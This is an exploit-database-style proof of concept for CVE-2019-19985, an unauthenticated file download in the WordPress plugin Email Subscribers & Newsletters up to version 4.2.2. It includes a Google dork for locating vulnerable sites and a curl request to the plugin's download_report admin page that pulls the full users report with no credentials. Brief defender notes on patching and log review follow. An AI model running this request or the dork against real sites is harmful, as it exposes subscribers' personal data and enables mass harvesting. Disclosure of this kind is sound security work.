# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985
################################################################################################
# ___ ___ ___ ______ #
#/\\ /\\ /\\ /\\/\\___ #
# /::\\ /::\\ /::\\ /::\\ \:\\/\\#
#/:/\ \\ /:/\:\\ /:/\:\\ /:/\:\\ \:\\ \:\\ #
# _\:\~\ \\ /:/\:\\ /:/\:\\ /::\~\:\\/::\\/::\__\#
#/\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/#
#\:\ \:\ \/__\:\\ /:/\:\/\ \/__\:\~\:\ \/__/:/\/__/\/:// #
# \:\ \:\__\\:\/:// \:\ \:\__\\:\ \:\__\/://\::/__/#
#\:\/:// \:\/:// \:\/:// \:\ \/__/\/__/\:\__\#
# \::// \::// \::// \:\__\\/__/#
#\/__/ \/__/ \/__/ \/__/ #
# ___ ___ ___ ___#
#/\\ /\\ /\\ /\\ #
# /::\\ /::\\ /::\\ /::\\#
#EXPLOIT /:/\:\\ /:/\ \\ /:/\:\\ /:/\:\\ #
# Email Subscribers & Newsletters <= 4.2.2/::\~\:\\ _\:\~\ \\ /::\~\:\\ /:/\:\\#
# Unauthenticated File Download/:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
#\:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\\\/__/ #
# \:\ \:\__\\:\ \:\__\\:\ \:\__\\:\\ #
#\:\ \/__/ \:\/:// \:\ \/__/ \:\\#
# \:\__\\::// \:\__\\:\__\ #
#KBAZ\/__/ \/__/ \/__/ \/__/ #
##
##
################################################################################################
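# Proof of concept: the request below carries no session cookie or other credential.
# On affected versions (<= 4.2.2) the download_report admin page still returns the
# requested report. This is the unauthenticated file download tracked as CVE-2019-19985.
curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
# Defender notes: update the plugin to a release newer than 4.2.2. Review web server
# access logs for requests to admin.php with page=download_report that do not come
# from a known administrator. Treat any report served to such a request as disclosed.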